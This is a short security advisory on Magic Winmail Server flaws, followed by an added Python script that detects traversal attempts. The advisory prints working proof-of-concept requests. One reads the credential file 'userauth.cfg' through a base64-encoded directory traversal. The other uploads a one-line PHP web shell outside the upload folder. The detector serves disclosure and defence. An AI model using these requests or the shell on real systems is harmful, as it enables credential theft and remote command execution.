Magic Winmail Server Multiple Vulnerabilities
Exploits are not required.

The following proof of concept is available exploiting the download directory traversal vulnerability to attain the 'userauth.cfg' file:

http://www.example.com:6080/download.php?
sid=656041e927559a2ff& // this must be the current session id
tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==

// Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of /../../../../userauth.cfg

http://www.example.com:6080/download.php?
sid=656041e927559a2ff&
tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1&filename=/../../../../userauth.cfg

The following proof of concept is available for the upload directory traversal vulnerability:

-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download

<?php
system($_GET[cmd]);
?>
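For log review, the first request above will not match a plain "../" signature because the path is base64-encoded in the 'filename' parameter. The following detection sketch is an added example, not part of the original advisory or the vendor's code: it decodes 'filename' when it is valid base64 and flags any value, in a download URL or an upload Content-Disposition header, that climbs above its starting directory. The function names and the benign sample are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

def escapes_root(name):
    """True if walking the path components ever climbs above the start directory."""
    depth = 0
    for part in name.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        depth += -1 if part == ".." else 1
        if depth < 0:
            return True
    return False

def candidates(value):
    """Yield the raw value and, when it is valid base64 text, its decoded form."""
    yield value
    try:
        yield base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return

def flag_download(url):
    """Return 'filename' values (raw or base64-decoded) that traverse upward."""
    query = parse_qs(urlsplit(url).query)
    return [c for v in query.get("filename", []) for c in candidates(v) if escapes_root(c)]

def flag_upload(part_headers):
    """Return multipart Content-Disposition filenames that traverse upward."""
    names = re.findall(r'filename="([^"]*)"', part_headers)
    return [n for n in names if escapes_root(n)]

BASE = ("http://www.example.com:6080/download.php?sid=656041e927559a2ff"
        "&tid=0&folder=INBOX&ix=0&part=1&optype=download")
SAMPLES = [
    BASE + "&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==",  # request from the advisory
    BASE + "&cache=1&filename=/../../../../userauth.cfg",                  # request from the advisory
    BASE + "&type=nonmime&filename=cmVwb3J0LnBkZg==",                      # constructed benign: report.pdf
]
UPLOAD = 'Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"'  # from the advisory

if __name__ == "__main__":
    for url in SAMPLES:
        print(flag_download(url) or "clean")
    print(flag_upload(UPLOAD))
```

The same containment check, applied server-side to the decoded name before any file is opened or written, is the corresponding mitigation.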